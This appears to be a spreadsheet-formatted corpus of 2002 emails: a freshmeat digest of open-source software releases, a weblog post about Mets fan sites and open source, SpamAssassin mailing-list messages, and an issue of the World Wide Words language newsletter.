crash that would occur sometimes when viewing events with reminders.License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/chronos/                        - %  - %  - % - % -[010] - CLIP 0.99.4 
  by Uri Hnykin (http://freshmeat.net/users/Uri/)
  Tuesday, July 30th 2002 17:00Database
Database :: Database Engines/Servers
Internet :: WWW/HTTP :: Dynamic Content :: CGI Tools/LibrariesAbout: CLIP is a Clipper/XBase compatible compiler with initial support
for FoxPro, Flagship, and CAVO syntax. It supports Linux, FreeBSD,
OpenBSD, and Win32 (via Cygwin). It features support for international
languages and character sets, including two-bytes character sets like
Chinese and Japanese. It also features OOP, a multiplatform GUI based on
GTK/GTKextra, all SIX/Comix features (including hypertext indexing), SQL,
a C-API for third-party developers, a few wrappers for popular libraries
(such as BZIP, GZIP, GD, Crypto, and Fcgi), multitasking, mouse events,
and more.  Changes: There are many fixes for compatibility. An Interbase (Firebird)
client has been added. There are new FiveWin-like functions and classes.License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/clip/                        - %  - %  - % - % -[011] - countertrace 1.0 
  by Michael C. Toren (http://freshmeat.net/users/mct/)
  Tuesday, July 30th 2002 00:43InternetAbout: countertrace is a userland iptables QUEUE  target handler for Linux
2.4 kernels running  Netfilter. It attempts to give the illusion that 
there are multiple, imaginary IP hops between  itself and the rest of the
world. The imaginary  hops that countertrace projects also have the 
ability to introduce accumulative, imaginary  latency.License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/countertrace/                        - %  - %  - % - % -[012] - CRWInfo 0.2 
  by Sven Riedel (http://freshmeat.net/users/srd/)
  Tuesday, July 30th 2002 18:37Multimedia :: Graphics :: Capture :: Digital CameraAbout: CRWInfo extracts thumbnails and exposure information from Canon's
proprietary .crw RAW files, which can be output by certain of Canons
digital cameras.  License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/crwinfo/                        - %  - %  - % - % -[013] - DaDaBIK 2.1 beta 
  by Eugenio (http://freshmeat.net/users/eugenio/)
  Tuesday, July 30th 2002 18:36Database :: Front-EndsAbout: DaDaBIK is a PHP application that allows you to easily create a
highly customizable Web interface for a MySQL database in order to search,
insert, update, and delete records; all you need do is specify a few
configuration parameters. It is available in English, Italian, Dutch,
German, Spanish, and French. Changes: A new, lighter, and easier to use administration interface
(related to the internal table manager) is now available. The form now has
a better layout, and all the fields are correctly aligned, including
dates. All the translations are now up-to-date. It is now possible, for
select_single fields, to choose "other" during an insert and fill a
textbox by hand with an alternative value. That value will update the
select options, unless the option has been driven with a custom query
("SQL:......"). It is now possible to choose whether a field has to be
displayed on the details page. Other changes and bugfixes have been added.
License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/dadabik/                        - %  - %  - % - % -[014] - Danpei 2.8.2 (Stable)
  by peace24 (http://freshmeat.net/users/peace24/)
  Tuesday, July 30th 2002 11:01About: Danpei is a GTK+ based image viewer. It allows you to browse
through your image files in thumbnail form, and it can rename, cut, and
paste them easily with an interface similar to that of Windows Explorer. Changes: This release fixes the bug that caused the progressbar dialog to
not be displayed when dragging and dropping and the bug that, in some
cases, caused Gtk-WARNING to be displayed when cutting and pasting. License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/danpei/                        - %  - %  - % - % -[015] - dchub 0.1.2 
  by Eric (http://freshmeat.net/users/icemanbs/)
  Tuesday, July 30th 2002 05:32Communications :: File SharingAbout: dchub is a Direct Connect hub clone. It resembles an IRC server
with some extra features dedicated to file sharing. Changes: Minor bugs were fixed in the decoding of the MHUBLIST key, in the
Perl script handling dc++ clients, and in the hub registration function.
Python scripting was added.License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/dchub/                        - %  - %  - % - % -[016] - Distributed Checksum Clearinghouse 1.1.8 
  by Vernon Schryver (http://freshmeat.net/users/vjs/)
  Tuesday, July 30th 2002 13:04Communications :: Email
Communications :: Email :: FiltersAbout: Distributed Checksum Clearinghouse (DCC) is a system of clients and
servers that collect and count checksums related to mail messages. The
counts can be used by SMTP servers and mail user agents to detect and
reject bulk mail. DCC servers can exchange common checksums. The checksums
include values that are "fuzzy", or constant across common variations in
bulk messages. Changes: A fix for "invalid database address" problems on SPARC systems,
and other changes. License: Freely DistributableURL: http://freshmeat.net/projects/dcc-source/                        - %  - %  - % - % -[017] - dnstracer 1.6 
  by Edwin Groothuis (http://freshmeat.net/users/mavetju/)
  Tuesday, July 30th 2002 10:43Internet :: Name Service (DNS)
System :: Networking
UtilitiesAbout: dnstracer determines where a given Domain Name  Server (DNS) gets
its information from, and follows  the chain of DNS servers back to the
servers which  know the data. Changes: This release adds support for SOA records. License: BSD LicenseURL: http://freshmeat.net/projects/dnstracer/                        - %  - %  - % - % -[018] - Document Manager 2.0-pre1 (Development)
  by Dobrica Pavlinusic (http://freshmeat.net/users/dpavlin/)
  Tuesday, July 30th 2002 05:28Internet :: WWW/HTTP
Internet :: WWW/HTTP :: Site Management
Office/BusinessAbout: Document Manager is a document management system with the ability
to check-in/check-out documents, track changes, and support multiple
users. It supports all usual operations (rename, delete, view, edit) and
comes with optional support for a secure HTTP server.Changes: This development release is probably not ready for production
yet, but contains new features, including a repository which is not in the
Web server tree, an ACL implementation called trustee, and new
documentation. It works with register_globals off in PHP.License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/docman/                        - %  - %  - % - % -[019] - dougnet 1.0 
  by Doug (http://freshmeat.net/users/dougedoug/)
  Tuesday, July 30th 2002 02:17InternetAbout: dougnet is a collection of useful functions to  helping programmers
make their programs  network enabled quickly and easily. It can be 
directly embedded into a program, creating no  hassle for users. It is
highly portable and very  easy to use.License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/dougnet/                        - %  - %  - % - % -[020] - Dump/Restore 0.4b31 
  by Stelian Pop (http://freshmeat.net/users/spop/)
  Tuesday, July 30th 2002 12:57System :: Archiving :: Backup
System :: Archiving :: Compression
System :: FilesystemsAbout: The dump package contains both dump and restore. Dump examines
files in a filesystem, determines which ones need to be backed up, and
copies those files to a specified disk, tape or other storage medium. The
restore command performs the inverse function of dump; it can restore a
full backup of a filesystem. Subsequent incremental backups can then be
layered on top of the full backup. Single files and directory subtrees may
also be restored from full or partial backups.Changes: This release fixes a bug (introduced with 0.4b29) which prevented
the use of a remote tape drive. License: BSD LicenseURL: http://freshmeat.net/projects/dumprestore/                        - %  - %  - % - % -[021] - DungeonMaker 2.01 
  by henningsen (http://freshmeat.net/users/henningsen/)
  Tuesday, July 30th 2002 18:22About: The DungeonMaker is a program/class library that generates random
dungeons and labyrinths using artificial life methods. It can be used for
pen-and-paper roleplaying, but is mostly intended to generate random maps
for computer role playing games. Changes: This is a complete rewrite that improves labyrinth creation and
introduces dungeon creation and placement of treasure and MOBs. License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/dungeonmaker/                        - %  - %  - % - % -[022] - File Roller 2.0.0 
  by HPG (http://freshmeat.net/users/paobac/)
  Tuesday, July 30th 2002 06:19System :: ArchivingAbout: File Roller is an archive manager for the GNOME environment. As an
archive manager, it can create and modify archives, view the content of an
archive, view a file contained in the archive, and extract files from the
archive. File Roller is only a frontend (a graphical interface) to
archiving programs like tar and zip. Changes: Ported to GNOME 2, added an option to view the destination folder
after extraction, rearranged the menus, and added mnemonics to all
dialogs. Nautilus is now used as the document viewer.License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/fileroller/                        - %  - %  - % - % -[023] - FrontStella 1.2 
  by James de Oliveira (http://freshmeat.net/users/herege/)
  Tuesday, July 30th 2002 00:11System :: EmulatorsAbout: FrontStella is a GNOME front-end for the xstella Atari emulator. It
allows you to set and preserve a name and a screen shot for a particular
ROM. It also allows you to set and keep some global options for the
emulator. You can add as many ROMs as you want.  Changes: Added keyboard shortcuts, and the ability to double-click on a
ROM. A pop-up menu was added, some known bugs were fixed, and the image is
now scaled to fit in the window.License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/frontstella/                        - %  - %  - % - % -[024] - gCVS 1.0b4 
  by Karl-Heinz Bruenen (http://freshmeat.net/users/bruenen/)
  Tuesday, July 30th 2002 05:32Software Development :: Version Control
Software Development :: Version Control :: CVSAbout: gCVS is a GTK port of WinCVS, a Windows-based CVS client.Changes: Serveral bugs were fixed.License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/gcvs/                        - %  - %  - % - % -[025] - gimp-print 4.2.2-pre4 (Stable)
  by Robert Krawitz (http://freshmeat.net/users/rlk/)
  Tuesday, July 30th 2002 21:38Multimedia :: Graphics
PrintingAbout: Gimp-Print is a collection of very high quality printer drivers for
UNIX/Linux. The goal of this project is uncompromising print quality and
robustness. Included with this package is the Print plugin for the GIMP
(hence the name), a CUPS driver, and two drivers (traditional and
IJS-based) for Ghostscript that may be compiled into that package. This
driver package is Foomatic-compatible and provides Foomatic data to enable
plug and play with many print spoolers. In addition, various printer
maintenance utilities are included. Many users report that the quality of
Gimp-Print on high end Epson Stylus printers matches or exceeds the
quality of the drivers supplied for Windows and Macintosh.Changes: This release fixes a serious and longstanding problem whereby
prints to certain Epson printers hosted on a Windows system are
incomplete; the bottom of the last page of the print is chopped off. There
are also some minor tweaks for the Epson Stylus Photo 2100/2200. License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/gimp-print/                        - %  - %  - % - % -[026] - gnocl 0.5.1 
  by Peter G. Baum (http://freshmeat.net/users/baum/)
  Tuesday, July 30th 2002 17:17Software Development :: Widget SetsAbout: gnocl is a GTK / Gnome extension for the programming language Tcl.
It provides easy to use commands to quickly build Gnome compliant user
interfaces including the Gnome canvas widget and drag and drop support. It
is loosely modeled after the Tk package.Changes: This release features many GTK+ 2.0 related bugfixes, a new tree
and list widget, and dialogs for selecting color, font, and files. There
is still no support for special Gnome 2.0 widgets (e.g. canvas).License: BSD LicenseURL: http://freshmeat.net/projects/gnocl/                        - %  - %  - % - % -[027] - GnomeICU 0.98.3 
  by Patrick (http://freshmeat.net/users/phsung/)
  Tuesday, July 30th 2002 18:03Desktop Environment :: Gnome
System :: NetworkingAbout: GnomeICU is a Gnome application which allows one to communicate
with other GnomeICU users or others who use ICQ (Windows, Java, Mac, etc).
With GnomeICU, one can send and receive messages, change online modes,
chat in realtime, send and receive URLs, and much more.Changes: A new XML contacts list file, better user authorization support,
more stable server side contacts list support, many other bugfixes, and
some new languages. License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/gnomeicu/                        - %  - %  - % - % -[028] - GNUstep 1.4.0 (LaunchPad)
  by Adam Fedor (http://freshmeat.net/users/afedor/)
  Tuesday, July 30th 2002 00:31Desktop Environment :: GNUstepAbout: GNUstep is a set of general-purpose Objective-C libraries based on
the OpenStep standard developed by NeXT (now Apple) Inc. The libraries
consist of everything from foundation classes, such as dictionaries and
arrays, to GUI interface classes such as windows, sliders, buttons, etc.Changes: The Make package has gone through an extensive reorganization,
allowing for better code sharing and a speed increase by at least a factor
of 2. The Base library now works better on Windows and Darwin, and has
better language support.License: GNU Lesser General Public License (LGPL)URL: http://freshmeat.net/projects/gnustep/                        - %  - %  - % - % -[029] - grocget 0.5 
  by Anthony Tekatch (http://freshmeat.net/users/anthonytekatch/)
  Tuesday, July 30th 2002 22:57UtilitiesAbout: grocget helps you shop for groceries faster and more reliably. It
can print a master inventory list, as well as an aisle-sorted shopping
list. Changes: Changes for using with Python 2.0, and changes to allow running
from current directory. License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/grocget/                        - %  - %  - % - % -[030] - hdup 1.4.0-1 (Stable)
  by Miek Gieben (http://freshmeat.net/users/miek/)
  Tuesday, July 30th 2002 05:50System :: Archiving :: Backup
System :: Archiving :: CompressionAbout: hdup is used to back up a filesystem. Features include encryption
of the archive (via mcrypt), compression of the archive (bzip/gzip/none),
the ability to transfer the archive to a remote host (via scp), and no
obscure archive format (it is a normal compressed tar file).Changes: Added a -f option to force restoring to '/', and made
documentation cleanups. Restoring a single file is now possible, and
compilation now depends on GNU make.License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/hdup/                        - %  - %  - % - % -[031] - Highlight 0.1 
  by Andrï¿½ Simon (http://freshmeat.net/users/Saalen/)
  Tuesday, July 30th 2002 10:36Text ProcessingAbout: Highlight is a universal source code to HTML, XHTML, RTF, or
(La)TEX converter. (X)HTML output is formatted by Cascading Style Sheets.
It supports Bash, C, C++, Java, Javascript, Lua, Assembler, Perl, PHP,
PL/SQL, (Object) Pascal, and Visual Basic files. It's possible to easily
enhance Highlight's parsing database. License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/highlight/                        - %  - %  - % - % -[032] - honeyd 0.3 
  by Niels Provos (http://freshmeat.net/users/nielsprovos/)
  Tuesday, July 30th 2002 12:47Internet
System :: MonitoringAbout: Honeyd is a small daemon that creates virtual hosts on a network.
The hosts can be configured to run arbitrary services, and their TCP
personality can be adapted so that they appear to be running certain
versions of operating systems. Honeyd enables a single host to claim
multiple addresses on a LAN for network simulation. It is possible to ping
the virtual machines, or to traceroute them. Any type of service on the
virtual machine can be simulated according to a simple configuration file.
Instead of simulating a service, it is also possible to proxy it to
another machine.Changes: UDP support (including proxying), and many bugfixes. License: BSD LicenseURL: http://freshmeat.net/projects/honeyd/                        - %  - %  - % - % -[033] - ioperm for Cygwin 0.1 
  by Marcel Telka (http://freshmeat.net/users/telka/)
  Tuesday, July 30th 2002 10:55Software Development :: LibrariesAbout: ioperm for Cygwin adds support for the ioperm() function to Cygwin
(for Windows NT/2000/XP). This support includes sys/io.h and sys/perm.h
header files (not included in Cygwin by default) with development and
runtime libraries. License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/ioperm/                        - %  - %  - % - % -[034] - IPSquad Packages From Scratch 0.6 
  by Er-Vin (http://freshmeat.net/users/ervin/)
  Tuesday, July 30th 2002 05:58System :: Archiving :: Packaging
System :: Installation/Setup
System :: LoggingAbout: IPFS (IPSquad Package From Source) is a system which allows you to
trace an program's installation from sources and register it in your
favorite packaging system. (Only Slackware 8.1 is currently supported.)
IPFS watches a command (generally make install), collects the list of
added files, and then registers them in the chosen packaging system as if
the install was made from a normal package. Unlike other similar products,
IPFS is able to track both shared and statically linked programs. A
Slackware 8.1 package for IPFS is available for download. Changes: The old resolve_path shell script has been replace with a newer
and faster ipfs_realpath coded in C.License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/ipfs/                        - %  - %  - % - % -[035] - j 0.16.1 
  by Peter Graves (http://freshmeat.net/users/petergraves/)
  Tuesday, July 30th 2002 16:58Text EditorsAbout: J is a multifile, multiwindow programmer's editor written entirely
in Java. It features syntax highlighting for Java, C, C++, XML, HTML, CSS,
JavaScript, Lisp, Perl, PHP, Python, Ruby, Scheme, Tcl/Tk, Verilog, and
VHDL, automatic indentation, directory buffers, regular expressions,
multifile find and replace, autosave and crash recovery, undo/redo, and
FTP/HTTP support. All keyboard mappings can be customized. Themes may be
used to customize the editor's appearance.Changes: This release adds support for named sessions.License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/j/                        - %  - %  - % - % -[036] - jmame 0.3-beta 
  by Joe Ceklosky (http://freshmeat.net/users/jceklosk/)
  Tuesday, July 30th 2002 23:05About: yyyyame is a Java-based frontend to XMAME. It uses the Swing toolkit
and uses XML to store all settings.Changes: A new abiltiy to verify ROMs using XMAME was added. The status
area also displays XMAME verify commands and output. make install and make
uninstall commands were also added to the Makefile (edit the Makefile to
change the default install location, which is /usr/local/jmame)  License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/yyyyame/                        - %  - %  - % - % -[037] - Kadmos OCR/ICR engine 3.5q 
  by Tamas Nagy (http://freshmeat.net/users/nagytam/)
  Tuesday, July 30th 2002 18:21Multimedia :: Graphics
Software Development :: LibrariesAbout: The Kadmos OCR/ICR (handwriting) recognition engine has multiple
languages support (it covers all Latin languages plus others). Interfaces
are available for C/C++/VB/Delphi, and Java upon request. It also has
isolated character (REC), isolated line (REL), and paragraph (REP)
recognition modules. Changes: New image manipulation functions were added to the API. License: Other/Proprietary LicenseURL: http://freshmeat.net/projects/kadmos/                        - %  - %  - % - % -[038] - Kallers 0.2.2 
  by Nadeem Hasan (http://freshmeat.net/users/nhasan/)
  Tuesday, July 30th 2002 10:57Communications :: Telephony
Desktop Environment :: K Desktop Environment (KDE)About: Kallers is KDE system tray applet that displays  the caller ID
information sent by phone  companies. It requires a caller ID capable 
modem. It logs every call internally using an  XML format, displays call
infomation non- intrusively using a popup window, and  optionally plays a
ring sound when a call is  received. It can optionally ignore anonymous 
calls. A handy call browser lets you view the  call information.Changes: This release fixes anonymous call handling and adds a minor
layout fix in the call browser. License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/kallers/                        - %  - %  - % - % -[039] - Kemerge 0.6 
  by Yannick Koehler (http://freshmeat.net/users/ykoehler/)
  Tuesday, July 30th 2002 17:14Desktop Environment :: K Desktop Environment (KDE)
System :: Installation/Setup
System :: Software Distribution ToolsAbout: Kemerge is a KDE graphical front end for Gentoo portage tools.Changes: This release can filter the display of the ebuild list by all
possible columns using a regular expression.License: GNU General Public License (GPL)URL: http://freshmeat.net/projects/kemerge/                        - %  - %  - % - % -[040] - KMencoder 0.1.2 
  by RoLo (http://freshmeat.net/users/rolosworld/)
  Tuesday</t>
  </si>
  <si>
    <t xml:space="preserve">Â Apparently the NY Mets couldn't find a way to compromise with some of the team's most dedicated fans. A sad day for New York baseball. What would Mookie say??Â 
Salon: "Listen's $10-per-month Rhapsody service has a fantastic interface, and, since it has content from all five labels, you can find much of what you'd like on it. You can listen to any song as often as you'd like -- an option that gives a taste of what a perfect subscription service would feel like. The only trouble is, Listen won't let you burn -- and, as one file trader asked, 'Who wants to be stuck listening to shit at their computer?'" Â 
Martin Schwimmer, a trademark attorney and Mets fan, weighs in on Bryan Hoch's MetsOnline situation.Â 
Joel Klein, Microsoft's chief prosecutor in the Clinton Administration, is named chancellor of New York's public school system.Â 
It's been one week since Salon's blogs booted up. Scott Rosenberg posts a progress report. Â 
FarrFeed: "I love this stuff."Â 
I know this isn't big news for most of you, but I'm no longer the first Dave on Google. Maybe someday I will be, again. :-(Â 
Well, yesterday I went for my 30-day post op review (it was actually 38 days after I was discharged) and there was good news and bad news. The good news is that I'm healing quickly. My body is very strong and doing really well. My blood pressure is great. Heart rate is great. Cholesterol needs work and I have to lose a bunch of weight, and of course I can't smoke. Now the bad news. I have to be a saint for the rest of my life. I knew this day was coming. As I start to feel better, I want to relax. That ain't going to happen. Oy. Here's my old theme song. "Don't ask me to be Mister Clean, cause baby I don't know how." I need a new song. Oh mama. Â 
Ed Cone's got the blogging bug: "I filed my N&amp;R column about the bad proposed corporate hacking bill. It will run on Sunday -- it's an early deadline no matter what, but after blogging for a few months it's almost painful to wait so long. I feel like just posting it now, or scooping myself with the best parts....but patience is a virtue." Hehe.Â 
Historian Stephen Ambrose, who is interviewed on the PBS News Hour today: "You can do whatever the hell you want. Who's going to criticize you? And if they do, what the hell do you care?" Â 
Radio Free Blogistan: Blogger vs Radio.Â 
Reuters: "Stocks briefly extended their losses in late morning trading on Tuesday, biting into Monday's monster rally."Â 
Thanks to Glenn Reynolds for the link to metsonline.net. As a Mets fan since 1962, I think it's great that sites like this exist and are flourishing. Like Bryan Hoch, the webmaster, I also run websites as a labor of love, and know there isn't generally a whole lot of money left over after you pay for bandwidth. I totally believe Hoch, a college student, when he says he isn't making money. The site clearly disclaims that it is not representative of the Mets or Major League Baseball. If you go deeper you see that Hoch contributed his time for free to help the Mets improve their own site, before all sites were taken over by MLB in 2001 (what a bad idea, why can't teams differentiate themselves based on the quality of their community sites). Now of course there's another side to it, so let's keep an open mind. But to the owners of the Mets, please remember, it's the fans that make it work, and it's pretty clear that this website is from the fans, for the fans and the team, and that's a good thing.Â 
Postscript: I've been emailing with Bryan, and asked if the local NY press has taken up his cause. He says: "Not yet. You can help by calling any one of the major metro papers (Post, Daily News, Times, Newsday)." More.. Ernie the Attorney is looking into this. "LSU Law School is suing one of its students for trademark infringement over a website that he maintains. The site is called lsulaw.com, and it includes a school calendar, law-related links and comments by Douglas Dorhauer, some of them critical of the law school."Â 
Bret Fausett, yesterday: "It's hard to imagine a more complete win than what ICANN Director Karl Auerbach received today from Los Angeles Superior Court Judge Dzintra Janavs."Â 
James Jarrett wonders where is his blog flow?Â 
Mark Crane writes: "Woke up early the other morning, and started listening to a BBC special on the Silicon Valley. Suddenly I heard the voice of Dave Winer, and he sounded like this mellow California hippy-geek. You should do a DaveNet that is just a stream of you reading the essay.  Hearing the Dave voice totally changed my perceptions of the Dave Winer experience." It's true, I have a pretty soft voice. I laugh a lot too. Many people are surprised. Â 
OSCON, last week, has done its job and stirred the embers of the Great Open Source Debate of the 1990s. I found myself writing in an email yesterday: "Very little really usable software has come from people who are willing to work for $0. (I chose my words carefully, infrastructure is another matter entirely.)  Further, it's weird to say, as Richard Stallman does, that by coercing programmers to work for $0 that that's freedom. To me it seems obvious that that's slavery." Â 
Washington Post: "Operated for years by Internet addressing giant VeriSign Inc., dot-org is slated to get a new landlord in October when VeriSign relinquishes its hold on the domain."Â 
Two years ago on this day: "The best standard is the one with the most users."Â 
Ponder yesterday's riddle. Then click on the solution. Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">BTW Ken Shan suggested making a set of corpus data publically available,
so that different classification algos can be tried out.I'd be happy to do that -- providing the nonspam.log and spam.log files
from my mass-check output (ie. the "matrix of test results" in Ken's
terms).  Along with the default scores, this is the entire input data set
for the SpamAssassin GA system.So, if anyone wants a go, contact me by mail.--j.-- 
'Justin Mason' =&gt; { url =&gt; http://jmason.org/ , blog =&gt; http://taint.org/ }
-------------------------------------------------------
This sf.net email is sponsored by: Dice - The leading online job board
for high-tech professionals. Search and apply for tech jobs today!
http://seeker.dice.com/seeker.epl?rel_code=31
_______________________________________________
Spamassassin-devel mailing list
Spamassassin-devel@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-devel
</t>
  </si>
  <si>
    <t xml:space="preserve">Justin Mason wrote:
&gt; I'd be happy to do that -- providing the nonspam.log and spam.log files
&gt; from my mass-check output (ie. the "matrix of test results" in Ken's
&gt; terms).  Along with the default scores, this is the entire input data set
&gt; for the SpamAssassin GA system.Always happy to contribute my mass-check logs.  The only problem is that was
all have to be using the exact same ruleset.Let me know if you want them.rOD.
--
"I would also have accepted 'Snacktacular'"&gt;&gt; Doing the blogging thang again at http://www.groovymother.com/ &lt;&lt;
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.editorandpublisher.com/editorandpublisher/features_columns/articl
e_display.jsp?vnu_content_id=1570036(or http://makeashorterlink.com/?A1D525B61 if that URL wrapped)rOD.
--
"If I was a front porch swing, would you let me hang?
 If I was a dancefloor, would you shake your thang?
 If I was a rubber check, would you let me bounce
 Up and down inside your bank account?"&gt;&gt; Doing the blogging thang again at http://www.groovymother.com/ &lt;&lt;-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">I rigged this up for testing before I commit to a sitewide rollout of
Spamassassin as an SMTP relay.
It is more work, but it avoids sitewide changes in mail delivery during the
early stages of testing.On the Exchange server... (mail.yourdomain.com)
Create a new, private SMTP address (nomorespam@yourdomain.com) for the
mailbox you want to protect. Remove the old address.Create a "custom recipient" with the old SMTP address
(spammedalot@yourdomain.com). Create another custom recipient pointing at a
local user on the Spamassassin box (killspam@filtermail.yourdomain.com).Set the first custom recipient to forward all mail to the second custom
recipient. (must forward to another address in the Exchange directory)On the Spamassassin box... (filtermail.yourdomain.com)
Set up a dummy user, in this case "killspam"
Give killspam a .forward file pointing to the final recipient's new, private
smtp address back on the Exchange server.So the message flow is like this:Mail arrives on the Exchange server mail.yourdomain.com for
spammedalot@yourdomain.comspammedalot@commonwealth.com forwards it to
killspam@filtermail.yourdomain.comFollowing the .forward file, the e-mail is then forwarded to
nomorespam@yourdomain.com
Wowie Zowie it works. The first address I protected was myself, the second
one I protected was postmaster.As you can see, you must create two custom recipients in Exchange and one
dummy account with a .forward file on the spam filter box for each address
you want to protect. Like I said, it is more work, but until I am done
load-testing, this is the way it will stay.-jake
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t>WORLD WIDE WORDS          ISSUE 301          Saturday 3 August 2002
-------------------------------------------------------------------
Sent each Saturday to 15,000+ subscribers in at least 119 countries
Editor: Michael Quinion, Thornbury, Bristol, UK      ISSN 1470-1448
-------------------------------------------------------------------
 IF YOU RESPOND TO THIS MAILING, REMEMBER TO CHANGE THE OUTGOING
   ADDRESS TO ONE OF THOSE IN THE 'CONTACT ADDRESSES' SECTION.
Contents
-------------------------------------------------------------------
1. Feedback, notes and comments.
2. Turns of Phrase: Thinspiration.
3. Weird Words: Usufructuary.
4. Q&amp;A: Three sheets to the wind; Mogadored; Skunk works.
5. Endnote.
6. Subscription commands.
7. Contact addresses.
1. Feedback, notes and comments
-------------------------------------------------------------------
COCKLES OF ONE'S HEART  You may recall that I was a bit suspicious
of the story I told in last week's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 it's also the name of the spiral cavity of the inner ear), so if
this story is right we should really be speaking of warming the
snails of one's heart.SERRANCIFIED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Atwood's novel, "Cat's Eye": she has two
teenage girls living in Toronto in the 1940s who say, "Are you
sufficiently sophonisified?". A Vancouver restaurant reviewer has
the pen name "Sufficiently Suffonsified". Oddly, there's also a
1999 record by the Austrian band Cunning Dorx entitled "Paradigms
Suffonsified". G H Gordon Paterson suggested that the word might be
a punning blend of "sufficient" and "fancified". There are some
tantalising suggestions that it may actually be Scots, and not New
World at all.ABSQUATULATE  I have been gently remonstrated with for describing
"sockdologer" as one of the products of early American linguistic
inventiveness that hasn't survived to the present day. Many people
gave me examples of current or recent use. I stand corrected.
2. Turns of Phrase: Thinspiration
-------------------------------------------------------------------
This is one of the key words associated with a deeply disquieting
online trend. In the past couple of years or so a number of Web
sites and chatrooms have appeared which actively promote anorexia
nervosa (known on the sites as "ana") and other eating disorders as
lifestyle choices. Since 90% of anorexics are young women, these
"pro-ana" sites are usually run by and attract that group (one term
sometimes used for them is "weborexics"). Sites offer suggestions
on how to become and remain thin, often through tips on avoiding
eating, and how to disguise the condition from family and friends.
Other themes sometimes featured on such sites are self-mutilation
("cutting") and bulimia ("mia"). Thin women, such as supermodels
and Calista Flockhart, are presented as "thinspirations", examples
to emulate. Sites have had names such as Starving for Perfection,
Wasting Away on the Web and Dying To Be Thin. Medical professionals
in the US and UK are deeply concerned about them, because they
accentuate the low self-regard of young women, who are particularly
prone to eating disorders, put their lives at risk, and discourage
them from facing their illness and seeking treatment for it.The Internet is home to a number of pro-eating disorder Web sites -
- places where sufferers can discuss tips, trade low-calorie
recipes and exchange poems and art that may be used as "triggers"
or so-called "thinspiration."
                                         ["Calgary Sun", Feb. 2002]A new trend among young adults has been sweeping the nation: pro-
anorexia Web sites. Also known as pro-ana, these sites glorify
anorexia nervosa and offer "thinspiration" on maintaining a
starvation lifestyle.
                                     ["University Wire", Apr. 2002]
3. Weird Words: Usufructuary  /ju:zjU'frVktju:@rI/
-------------------------------------------------------------------
A person who has the use or enjoyment of something, especially
property.We are short of words that contain four u's. Among the few that are
even relatively common (leaving aside the Hawaiian "muu-muu") are
"tumultuously" and "unscrupulous", although some rare words like
"pustulocrustaceous" and "pseudotuberculous" are also recorded.The term comes from Roman law. "Usufruct" is the right of temporary
possession or enjoyment of something that belongs to somebody else,
so far as that can be done without causing damage or changing its
substance. For example, a slave in classical Rome could not own
anything. Things he acquired as the result of his labour he merely
held "usus (et) fructus", under "use (and) enjoyment" - it was his
master who actually owned them.The term remains in use in modern US legal practice and elsewhere.
These days a "usufructuary" can be a trustee who enjoys the income
from property he holds in trust for somebody else. Many Native
American groups hold land on a "usufruct" basis, with rights to
enjoy the renewable natural resources of the land for hunting and
fishing.
4. Q&amp;A
-------------------------------------------------------------------
Q. How does the term "three sheets to the wind" denote drunkenness?
[Benjamin Weatherston]A. It's a sailor's expression.We ignorant landlubbers might think that a sheet is a sail, but in
traditional sailing-ship days, a "sheet" was actually a rope,
particularly one attached to the bottom corner of a sail (it comes
from an Old English term for the corner of a sail). The sheets were
vital, since they trimmed the sail to the wind. If they ran loose,
the sail would flutter about in the wind and the ship would wallow
off its course out of control.Extend this idea to sailors on shore leave, staggering back to the
ship after a good night on the town, well tanked up. The irregular
and uncertain locomotion of the jolly seafarers must have reminded
onlookers of the way a ship moved in which the sheets were loose.
Perhaps one loose sheet might not have been enough to get the image
across, so the saying became "three sheets to the wind".Our first written example comes from that recorder of low life,
Pierce Egan, in his "Real life in London" of 1821. But it must
surely be much older.                        -----------Q. My East End mother-in-law used to say she was "well and truly
mogadored" when she was puzzled by something. Any idea of
derivation and meaning? [Bryan]A. Now that's a bit of British slang I haven't heard in years,
though it is still around (Nanny Ogg uses it in one of Terry
Pratchett's Discworld fantasy stories, I am told). As you say, it
means that somebody is puzzled, confused, or "all at sea". It's
also sometimes spelled "moggadored", though it doesn't turn up in
print much in either spelling. (No relation to the British word
"moggy" for a cat, by the way, which seems to be a pet form of
"Margaret".)The writers of slang dictionaries are decidedly mogadored about its
origin. It looks very much like rhyming slang for "floored", which
is likewise slang, meaning dumbfounded or confused. But the dispute
arises over what the root is. Some say it is Irish, from "magagh",
to mock, jeer or laugh at, via an unrecorded intermediate form
"mogadÃ³i".Others suggest that, like some other East End slang terms, it
derives from the Gypsy language Romany (Cockney slang is like
London itself, a melting pot, in which words from many sources are
amalgamated, including Yiddish and old-time forces slang derived
